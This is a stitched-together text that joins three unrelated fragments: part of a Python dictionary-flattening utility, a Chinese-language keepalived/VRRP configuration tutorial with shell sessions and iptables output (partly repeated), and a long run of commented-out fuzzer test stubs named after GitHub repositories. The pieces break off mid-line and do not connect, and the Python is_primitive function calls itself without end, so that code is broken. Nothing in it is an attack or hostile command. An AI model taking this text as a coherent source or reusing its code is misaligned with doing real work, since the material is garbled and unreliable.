# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def is_primitive(the_thing):
'''Answer "is the type of this thing a primitive type?".'''
return is_primitive(type(the_thing))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def flatten(
entity,
path_prefix=None,
require_serializable=False,
flatten_leaves=False,
to_depth=None,
separator=DEFAULT_SEPARATOR
): # pylint: disable=bad-continuation
'''Construct a list of flat dicts representing a nested structure.
Parameters:
entity (list or dict)
The python entity to be flattened.
path_prefix (str)
A dot-separated string path. If defined, this will be
prepended to the paths extracted from ``entity``.
require_serializable (bool)
If ``True``, a ``TypeError`` will be raised if an
unserializable type is encountered while flattening
``entity``. If ``False``, a serializable replacement
representation of the unserializable structure will be
substituted (e.g., the result of calling ``str()`` on the
structure.)
flatten_leaves (bool)
If ``False``, lists of scalars will be treated as leaf
nodes. If ``True``, lists of scalars will be flattened.
Example::
>>> flatten.flatten({'A': [1,2,3]})
[{'A': [1, 2, 3]}]
>>> flatten.flatten({'A': [1,2,3]}, flatten_leaves=True)
[{'A': 1}, {'A': 2}, {'A': 3}]
to_depth (int)
The maximum depth to which to flatten.
The return value from ``flatten`` will be a list of dicts, where
each of the dicts values is either a scalar value or a simple list
of scalar values.
The entity being flattened must be a dictionary, list or scalar
value. It can contain no "immediately nested" lists; all lists it
contains must occur as the value for the key of a dict, and must
contain only other dicts or only scalars. A ``TypeError`` will be
raised if any other list is encountered.
If the ``path_prefix`` parameter is ``None``, entity must be an instance
of dict or a list of instances of dict, or a ``ValueError`` will
be raised.
If ``flatten`` encounters an unserializable type at a leaf of a
dict, the behavior is determined by the value of the
``require_serializable`` parameter:
**True:** Raise the ``TypeError`` resulting from attempting to
serialize the structure with ``json.dumps()``.
**False:** First see if the structure responds to a
``to_dict()`` method and use the result of that in place of
the original structure. If this approach doesn't succeed,
replace the original structure with the result of calling
``str()`` on it.
'''
# if to_depth is None:
# print "Flattening(%s): %s" % (to_depth, entity)
if to_depth is not None and to_depth <= 0:
# print "DEEP: %s" % entity
return entity
# Scalar: return a single item dict wrapped in an list.
# Anything else that's not handled further down: try to serialize
# into JSON. If that fails either raise a TypeError or return the
# stringification of the entity.
if not isinstance(entity, list) and not isinstance(entity, dict):
if not is_scalar(entity):
try:
entity = json.dumps(entity)
except TypeError as err:
if require_serializable:
raise err
else:
entity = str(entity)
# print "(scalar) %s" % entity
return entity if path_prefix is None else [{path_prefix: entity}]
elif isinstance(entity, list):
| |
lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:32:80:38 brd ff:ff:ff:ff:ff:ff
inet 10.0.0.7/24 brd 10.0.0.255 scope global noprefixroute eth0
valid_lft forever preferred_lft forever
inet 192.168.200.16/32 scope global eth0
valid_lft forever preferred_lft forever
inet 192.168.200.17/32 scope global eth0
valid_lft forever preferred_lft forever
inet 192.168.200.18/32 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe32:8038/64 scope link
valid_lft forever preferred_lft forever
[root@centos7 ~]#hostname -I
10.0.0.7 192.168.200.16 192.168.200.17 192.168.200.18
[root@centos7 ~]#ping 192.168.200.16
PING 192.168.200.16 (192.168.200.16) 56(84) bytes of data.
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted
^C
--- 192.168.200.16 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1000ms
[root@centos7 ~]#iptables -vnL
Chain INPUT (policy ACCEPT 860 packets, 46129 bytes)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.18
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.17
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.16
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 1737 packets, 1188K bytes)
pkts bytes target prot opt in out source destination
4 336 DROP all -- * * 192.168.200.18 0.0.0.0/0
0 0 DROP all -- * * 192.168.200.17 0.0.0.0/0
0 0 DROP all -- * * 192.168.200.16 0.0.0.0/0
[root@centos7 ~]#vim /etc/keepalived/keepalived.conf
#注释下面一行
#vrrp_strict
#重启动不生效,有bug
[root@centos7 ~]#systemctl restart keepalived.service
[root@centos7 ~]#ping 192.168.200.16
PING 192.168.200.16 (192.168.200.16) 56(84) bytes of data.
ping: sendmsg: Operation not permitted
ping: sendmsg: Operation not permitted
^C
--- 192.168.200.16 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 999ms
[root@centos7 ~]#iptables -vnL
Chain INPUT (policy ACCEPT 1219 packets, 67647 bytes)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.18
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.17
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.16
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 2282 packets, 1233K bytes)
pkts bytes target prot opt in out source destination
4 336 DROP all -- * * 192.168.200.18 0.0.0.0/0
0 0 DROP all -- * * 192.168.200.17 0.0.0.0/0
4 336 DROP all -- * * 192.168.200.16 0.0.0.0/0
#无法关闭进程
[root@centos7 ~]#systemctl stop keepalived.service
[root@centos7 ~]#ps aux|grep keepalived
root 1383 0.0 0.1 69672 1020 ? Ss 00:57 0:00 /usr/local/keepalived/sbin/keepalived -D
root 1384 0.0 0.2 69804 2308 ? S 00:57 0:00 /usr/local/keepalived/sbin/keepalived -D
root 1385 0.0 0.1 69672 1308 ? S 00:57 0:00 /usr/local/keepalived/sbin/keepalived -D
root 1392 0.0 0.0 112712 964 pts/0 R+ 00:59 0:00 grep --color=auto keepalived
[root@centos7 ~]#killall keepalived
[root@centos7 ~]#systemctl start keepalived.service
[root@centos7 ~]#ping 192.168.200.16
PING 192.168.200.16 (192.168.200.16) 56(84) bytes of data.
64 bytes from 192.168.200.16: icmp_seq=1 ttl=64 time=0.093 ms
^C
--- 192.168.200.16 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.093/0.093/0.093/0.000 ms
[root@centos7 ~]#iptables -vnL
Chain INPUT (policy ACCEPT 125 packets, 8493 bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 135 packets, 20190 bytes)
pkts bytes target prot opt in out source destination
'''
KeepAlived 配置说明
配置文件组成部分
'''
/etc/keepalived/keepalived.conf
'''
配置组成
'''
-GLOBAL CONFIGURATION
Global definitions:定义邮件配置,route_id,vrrp配置,多播地址等
-VRRP CONFIGURATION
VRRP instance(s):定义每个vrrp虚拟路由器
-LVS CONFIGURATION
Virtual server group(s)
Virtual server(s):LVS集群的VS和RS
'''
配置语法说明
全局配置
''''
#/etc/keepalived/keepalived.conf
global_defs {
notification_email {
root@localhost #keepalived 发生故障切换时邮件发送的目标邮箱,可以按行区分写多个
<EMAIL>
<EMAIL>
}
notification_email_from keepalived@localhost #发邮件的地址
smtp_server 127.0.0.1 #邮件服务器地址
smtp_connect_timeout 30 #邮件服务器连接timeout
router_id ha1.example.com #每个keepalived主机唯一标识,建议使用当前主机名,但多节点重名不影响
vrrp_skip_check_adv_addr #对所有通告报文都检查,会比较消耗性能,启用此配置后,如果收到的通告报文和上一个报文是同一个路由器,则跳过检查,默认值为全检查
vrrp_strict #严格遵守VRRP协议,禁止以下状况:1.无VIP地址 2.配置了单播邻居 3.在VRRP版本2中有IPv6地址,开启动此项会自动开启iptables防火墙规则,建议关闭此项配置,
vrrp_garp_interval 0 #gratuitous ARP messages报文发送延迟,0表示不延迟
vrrp_gna_interval 0 #unsolicited NA messages (不请自来)消息发送延迟
vrrp_mcast_group4 172.16.31.10 #指定组播IP地址,默认值:172.16.31.10 范围:172.16.31.10到192.168.3.11
vrrp_iptables #开启此项,当vrrp_strict开启时,不添加防火墙规则,否则VIP无法访问
}
'''
配置虚拟路由器
'''
vrrp_instance <STRING> {
配置参数
......
}
#配置参数:
state MASTER|BACKUP#当前节点在此虚拟路由器上的初始状态,状态为MASTER或者BACKUP
interface IFACE_NAME #绑定为当前虚拟路由器使用的物理接口,如:ens32,eth0,bond0,br0
virtual_router_id VRID #每个虚拟路由器惟一标识,范围:0-255,每个虚拟路由器此值必须唯一,否则服务无法启动,同属一个虚拟路由器的多个keepalived节点必须相同
priority 100 #当前物理节点在此虚拟路由器的优先级,范围:1-254,每个keepalived主机节点此值不同
advert_int 1 #vrrp通告的时间间隔,默认1s
authentication { #认证机制
auth_type AH|PASS
auth_pass <PASSWORD> #预共享密钥,仅前8位有效,同一个虚拟路由器的多个keepalived节点必须一样
}
virtual_ipaddress { #虚拟IP
<IPADDR>/<MASK> brd <IPADDR> dev <STRING> scope <SCOPE> label <LABEL>
192.168.200.100 #指定VIP,不指定网卡,默认为eth0,注意:不指定/prefix,默认为/32
192.168.200.101/24 dev eth1 #指定VIP的网卡
192.168.200.102/24 dev eth2 label eth2:1 #指定VIP的网卡label
}
track_interface { #配置监控网络接口,一旦出现故障,则转为FAULT状态实现地址转移
eth0
eth1
…
}
'''
范例:
'''
[root@centos7 ~]#cat /etc/keepalived/keepalived.conf
! Configuration File for keepalived
global_defs {
notification_email {
<EMAIL>
<EMAIL>
<EMAIL>
}
notification_email_from <EMAIL>
smtp_server 192.168.200.1
smtp_connect_timeout 30
router_id LVS_DEVEL
vrrp_skip_check_adv_addr
vrrp_strict #开启限制,会自动生效防火墙设置,导致无访问VIP
vrrp_garp_interval 0
vrrp_gna_interval 0
}
vrrp_instance VI_1 {
state MASTER
interface eth0
virtual_router_id 80 #修改此行
priority 100
advert_int 1
authentication {
auth_type PASS
auth_pass <PASSWORD>
}
virtual_ipaddress {
192.168.200.16
192.168.200.17
192.168.200.18
}
}
[root@centos7 ~]#systemctl start keepalived.service
[root@centos7 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:33:b4:1a brd ff:ff:ff:ff:ff:ff
inet 10.0.0.17/24 brd 10.0.0.255 scope global noprefixroute eth0
valid_lft forever preferred_lft forever
inet 192.168.200.16/32 scope global eth0
valid_lft forever preferred_lft forever
inet 192.168.200.17/32 scope global eth0
valid_lft forever preferred_lft forever
inet 192.168.200.18/32 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe33:b41a/64 scope link
valid_lft forever preferred_lft forever
[root@centos7 ~]#iptables -vnL
Chain INPUT (policy ACCEPT 59 packets, 3372 bytes)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.16
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.17
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.18
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 33 packets, 6940 bytes)
pkts bytes target prot opt in out source destination
[root@centos7 ~]#ping 192.168.200.16
PING 192.168.200.16 (192.168.200.16) 56(84) bytes of data.
^C
--- 192.168.200.16 ping statistics ---
6 packets transmitted, 0 received, 100% packet loss, time 5002ms
[root@centos7 ~]#
# 如果是CentOS 8 ,会显示以下warning
[root@centos8 ~]#iptables -vnL
Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
# Warning: iptables-legacy tables present, use iptables-legacy to see them
#无法访问VIP
[root@centos8 ~]#ping 192.168.200.16
PING 192.168.200.16 (192.168.200.16) 56(84) bytes of data.
^C
--- 192.168.200.16 ping statistics ---
6 packets transmitted, 0 received, 100% packet loss, time 143ms
'''
实现独立子配置文件
当生产环境复杂时,
'''
/etc/keepalived/keepalived.conf
'''
文件中内容过多,不易管理,可以将不同集群的配置,比如:不同集群的VIP配置放在独立的子配置文件中
'''
[root@ka1-centos8 ~]#mkdir /etc/keepalived/conf.d/
[root@ka1-centos8 ~]#tail -n1 /etc/keepalived/keepalived.conf
include /etc/keepalived/conf.d/*.conf
[root@ka1-centos8 ~]#vim /etc/keepalived/conf.d/cluster1.conf
'''
本文链接:http://www.yunweipai.com/35366.html
----------------------------------------------
Keepalived - 配置虚拟路由器
配置虚拟路由器
'''
vrrp_instance <STRING> {
配置参数
......
}
#配置参数:
state MASTER|BACKUP#当前节点在此虚拟路由器上的初始状态,状态为MASTER或者BACKUP
interface IFACE_NAME #绑定为当前虚拟路由器使用的物理接口,如:ens32,eth0,bond0,br0
virtual_router_id VRID #每个虚拟路由器惟一标识,范围:0-255,每个虚拟路由器此值必须唯一,否则服务无法启动,同属一个虚拟路由器的多个keepalived节点必须相同
priority 100 #当前物理节点在此虚拟路由器的优先级,范围:1-254,每个keepalived主机节点此值不同
advert_int 1 #vrrp通告的时间间隔,默认1s
authentication { #认证机制
auth_type AH|PASS
auth_pass <PASSWORD> #预共享密钥,仅前8位有效,同一个虚拟路由器的多个keepalived节点必须一样
}
virtual_ipaddress { #虚拟IP
<IPADDR>/<MASK> brd <IPADDR> dev <STRING> scope <SCOPE> label <LABEL>
192.168.200.100 #指定VIP,不指定网卡,默认为eth0,注意:不指定/prefix,默认为/32
192.168.200.101/24 dev eth1 #指定VIP的网卡
192.168.200.102/24 dev eth2 label eth2:1 #指定VIP的网卡label
}
track_interface { #配置监控网络接口,一旦出现故障,则转为FAULT状态实现地址转移
eth0
eth1
…
}
'''
范例:
'''
[root@centos7 ~]#cat /etc/keepalived/keepalived.conf
! Configuration File for keepalived
global_defs {
notification_email {
<EMAIL>
<EMAIL>
<EMAIL>
}
notification_email_from <EMAIL>
smtp_server 192.168.200.1
smtp_connect_timeout 30
router_id LVS_DEVEL
vrrp_skip_check_adv_addr
vrrp_strict #开启限制,会自动生效防火墙设置,导致无访问VIP
vrrp_garp_interval 0
vrrp_gna_interval 0
}
vrrp_instance VI_1 {
state MASTER
interface eth0
virtual_router_id 80 #修改此行
priority 100
advert_int 1
authentication {
auth_type PASS
auth_pass <PASSWORD>
}
virtual_ipaddress {
192.168.200.16
192.168.200.17
192.168.200.18
}
}
[root@centos7 ~]#systemctl start keepalived.service
[root@centos7 ~]#ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:33:b4:1a brd ff:ff:ff:ff:ff:ff
inet 10.0.0.17/24 brd 10.0.0.255 scope global noprefixroute eth0
valid_lft forever preferred_lft forever
inet 192.168.200.16/32 scope global eth0
valid_lft forever preferred_lft forever
inet 192.168.200.17/32 scope global eth0
valid_lft forever preferred_lft forever
inet 192.168.200.18/32 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe33:b41a/64 scope link
valid_lft forever preferred_lft forever
[root@centos7 ~]#iptables -vnL
Chain INPUT (policy ACCEPT 59 packets, 3372 bytes)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.16
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.17
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.18
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 33 packets, 6940 bytes)
pkts bytes target prot opt in out source destination
[root@centos7 ~]#ping | |
'repos', 'Marketing-for-Engineers')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_MegEngine():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'MegEngine')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Memeye():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Memeye')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_MeteorRider():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'MeteorRider')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Mock():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Mock')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Modern_JavaScript_Curriculum():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Modern-JavaScript-Curriculum')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Modernizr():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Modernizr')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Monorail_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Monorail.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Motrix():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Motrix')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_NG6_todomvc_starter():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'NG6-todomvc-starter')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_NativeBase():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'NativeBase')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_New_Media_Image_Uploader():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'New-Media-Image-Uploader')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_NiL_JS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'NiL.JS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Numeral_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Numeral-js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_OS_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'OS.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Object_observe():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Object.observe')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Octosplit():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Octosplit')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_OfflineMbTiles():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'OfflineMbTiles')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Oimo_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Oimo.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Openframe():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Openframe')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_OverReact():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'OverReact')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PHP_Vars_To_Js_Transformer():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PHP-Vars-To-Js-Transformer')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PNGDrive():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PNGDrive')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Parse_SDK_JS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Parse-SDK-JS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PexJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PexJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PhantomXHR():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PhantomXHR')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PhoneNumber_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PhoneNumber.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Phonegap_SQLitePlugin():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Phonegap-SQLitePlugin')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PhotoSwipe():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PhotoSwipe')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PhysicsJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PhysicsJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PixelJihad():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PixelJihad')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PowerBI_JavaScript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PowerBI-JavaScript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PptxGenJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PptxGenJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Presenteer_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Presenteer.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PreventSpider():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PreventSpider')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Programing_In_Javascript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Programing-In-Javascript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Proton():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Proton')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PubSubJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PubSubJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Pumpkin():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Pumpkin')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Pure_JavaScript_HTML5_Parser():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Pure-JavaScript-HTML5-Parser')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PureSlider():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PureSlider')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Push_It():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Push-It')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_QuickJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'QuickJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_QuoJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'QuoJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_RCSS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'RCSS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_RN_NavigationExperimental_Redux_Example():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'RN-NavigationExperimental-Redux-Example')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ROMManagerManifest():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ROMManagerManifest')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Radio():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Radio')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_RazorEngine():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'RazorEngine')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Reasons_Craft():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Reasons-Craft')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ReplayLastGoal():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ReplayLastGoal')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_RequireJS_Backbone_Starter():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'RequireJS-Backbone-Starter')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Revenant():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Revenant')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Rocket_Chat():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Rocket.Chat')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Rucksack():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Rucksack')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_RxJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'RxJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SJSJ():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SJSJ')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ScriptCommunicator():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ScriptCommunicator')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ScriptCraft():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ScriptCraft')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ScrollMagic():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ScrollMagic')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Scrolld_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Scrolld.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Scroller():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Scroller')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SeetaFaceEngine():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SeetaFaceEngine')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Selecter():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Selecter')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Semantic_UI():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Semantic-UI')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SendBird_JavaScript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SendBird-JavaScript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Serious_Engine():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Serious-Engine')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SilkJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SilkJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Sketch_Layer_Tools():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Sketch-Layer-Tools')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SketchGit():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SketchGit')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SketchSquares():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SketchSquares')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SketchToSwift():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SketchToSwift')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SlickGrid():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SlickGrid')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Snake_JavaScript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Snake-JavaScript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Snap_svg():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Snap.svg')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SocialFeed_js():
